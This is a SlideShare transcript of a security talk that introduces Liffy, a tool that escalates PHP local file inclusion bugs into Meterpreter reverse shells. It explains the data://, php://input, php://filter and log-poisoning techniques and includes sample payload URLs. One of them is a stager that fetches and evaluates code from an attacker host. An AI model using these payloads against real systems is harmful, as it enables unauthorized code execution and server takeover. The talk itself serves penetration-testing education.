From Ashy To Classy | LFI Exploitation with Liffy
Upcoming SlideShare
Loading in...5
×
 

Like this? Share it with your network

Share

From Ashy To Classy | LFI Exploitation with Liffy

on

  • 72 views

From Ashy To Classy | LFI Exploitation with Liffy

From Ashy To Classy | LFI Exploitation with Liffy

Statistics

Views

Total Views
72
Views on SlideShare
69
Embed Views
3

Actions

Likes
0
Downloads
0
Comments
0

2 Embeds 3

http://www.slideee.com 2
https://www.linkedin.com 1

Accessibility

Categories

Upload Details

Uploaded via as Microsoft PowerPoint

Usage Rights

© All Rights Reserved

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Processing…
Post Comment
Edit your comment

From Ashy To Classy | LFI Exploitation with Liffy Presentation Transcript

  • 1. From Ashy To Classy LFI Exploitation with Liffy
  • 2. Agenda File Inclusion Vulnerability History and Overview Liffy Introduction Techniques Considerations Future Development 2
  • 3. #whoami Application Security Practice Manager @VerSprite – We love product security! I <3 Python and Java Enterprise WebApp Background CTF player and boot2rooter Twitters: @rotlogix Personal Blog: http://rotlogix.com 3
  • 4. LFI History and Overview What is it? “The process of including files, that are already locally present on the server, through the exploiting of vulnerable inclusion procedures implemented in the application.” – https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion Issues with include(), and require() > untrusted code evaluation Example <?php include($_GET[‘file’]); ?> = http://target/find.php?file=/etc/passwd <?php “files/”.include($_GET[‘file’].”.php”); ?> = Requires traversal “../../ “ and null byte %00 The problem is passing a URL parameter which is user controlled as the file argument for an include or require statement. 4
  • 5. LFI History and Overview GitHub LULZ 5
  • 6. LFI History and Overview File Inclusion Vulnerabilities have been around forever! 2002? Around 340 “Inclusion” related entries on Exploit-DB over the last 5 years Vulnerability dropped from OWASP Top 10 in 2010 My Opinion? Doesn’t matter. Consider all the legacy PHP written applications, plugin development for things like Wordpress 6
  • 7. Liffy Introduction A tool that attempts to take a seemingly “read-only” LFI vulnerability into a full blown PHP Meterpreter web shell Developed in Python Currently has 10 features, which we will discuss Using Python’s SimpleHTTPServer library to spawn as needed web serving for payload staging Major enhancements added by Dan ‘unicornFurnace’ Crowley @SpiderLabs 7
  • 8. Liffy Feature Overview data:// - stream wrapper (code execution) php://input – stream wrapper (code execution) php://filter – stream wrapper (file reads) php://expect – process control extension (code execution) /proc/self/environ – CGI mode (code execution Apache access log poisoning (code execution) Linux auth log poisoning (code execution) Support for absolute and relative paths (log poisoning) Support for cookies Direct or staged payload delivery 8
  • 9. Payload Generation Leverages msfpayload PHP Meterpreter Reverse TCP Liffy allows you to set specify your own LHOST and LPORT for the Meterpreter Creates corresponding resource file which loads a multi-handler 9
  • 10. Direct & Staged Payloads This simply means directly executing your payload, or using additional code to download and execute your payload through the chosen technique (data://, php://input, etc) Staged Delivery Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php) Encode and use "<?php eval(file_get_contents(‘http://local:8000/{random}.php’))?> Spawn temporary web server to host shell out of /tmp directory Stager downloads and executes shell Listening handler catches reverse shell Direct Delivery Generate PHP Meterpreter through msfpayload (Stored: /tmp/{random}.php) Read payload from stored file (/tmp/{random}.php) Encode and send directly through wrapper – data://text/html;base64,{payload} Listening handler catches reverse shell 10
  • 11. Techniques: data:// RFC 2397 – data URL scheme “ Allows the inclusion of small data items as “immediate” data, as if it had been included externally” Stream wrapper supported since PHP 5.2.0 Usage: data://text/html;base64,{encoded code here} Restricted by allow_url_include (enabled / disabled) Set in php.ini If enabled you would potentially have an RFI as well “ Allows the use of URL-aware file open wrappers with functions like include” 11
  • 12. Techniques: data:// How do we use this? http://target.com/lfi.php?file=data://text/html;base64, PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= <?php system(‘whoami’); ?> = PD9waHAgc3lzdGVtKCd3aG9hbWknKTsgPz4= 12
  • 13. Techniques: data:// How does Liffy use this? Non-Staged: Generate payload with msfpayload and resource file Read payload from generated file Encode the payload Load listening handler for reverse connections Deliver it directly data://text/html;base64, {payload} Staged: Generate payload with msfpayload and resource file Encode <?php eval(file_get_contents(‘http://attacker/:8000/{shell}.php’))?> Load listening handler for reverse connections Spawn web server to host payload Execute 13
  • 14. Techniques: data:// > DEMO! 14
  • 15. Techniques: php://input Read-only stream wrapper Used in POST requests, allows you to read the response data Restricted by allow_url_include Example: 15
  • 16. Techniques: php://input How does Liffy implement this technique? Exactly the same as data:// Staged and Non-Staged Approach Really you should always chose Non-Staged in this scenario POST (direct delivery) = Non-Staged 16
  • 17. Techniques: php://input > DEMO! 17
  • 18. Techniques: SSH auth.log Poisoning Assumes you can include the SSH auth.log If you can there is a usually a misconfiguration issue! The process of injecting PHP code through a failed login attempts Code now appears in the auth.log Include auth.log for code execution! 18
  • 19. Techniques: SSH auth.log Poisoning Assumes you can include the SSH auth.log If you can there is a usually a misconfiguration issue! The process of injecting PHP code through a failed login attempts Code now appears in the auth.log Include auth.log for code execution! 19
  • 20. Techniques: SSH auth.log Poisoning Liffy implements by creating a payload through msfpayload Reads the PHP payload and assigns to “payload_1” Uses <?php eval($_GET[‘code’])?> as “payload_2” The second payload is used to poison the auth.log The first payload is what is called after the final inclusion “&code=“ Supports path traversal sequences if needed > “../, .., /../ “ 20
  • 21. Techniques: SSH auth.log Poisoning > DEMO! 21
  • 22. Techniques: Apache access.log Poisoning Requires being able to include the access.log, which means you might have to ../../../ (/var/log/apache2/access.log) Poison logs through the User-Agent by injecting PHP code Include the access.log and your PHP code get’s evaluated 22
  • 23. Techniques: Apache access.log Poisoning If the log location isn’t different (you should know this), Liffy defaults to the most common location Supports path traversal as we already saw with the auth.log Payload is creation is the same, but with only direct delivery Encodes the payload in base64 and uses eval(base64_decode()); to get around double or single quotes causing parse errors Again everything gets delivered through the User-Agent 23
  • 24. Techniques: Apache access.log Poisoning > DEMO! 24
  • 25. Techniques: php://filter Wrapper that supports permitting the application of filters to a stream when you opened Takes a resource argument, which is what you want to read Used in conjunction with base64 encoding “Conversion Filter” Takes the resource > streams and reads the data > converts to base64 > output is an base64 encoded string Example: http://target.com/vuln/lfi.php?file=php://filter/convert.base64-encode/resource=lfi.php 25
  • 26. Techniques: php://filter Liffy automates this for you! Prompts you for a file that you want to read Decodes the encoded string and echo's the contents back to the terminal Useful for viewing PHP source from files you have access to 26
  • 27. Techniques: php://filter > DEMO! 27
  • 28. Future Work Make the internal web server smarter and more reliable Better Object Oriented design Re-write the command-line interface Dynamic request object building and re-use for everything HTTP Support bypassing filters for path traversals Write custom PHP reverse shell with built-in handler 28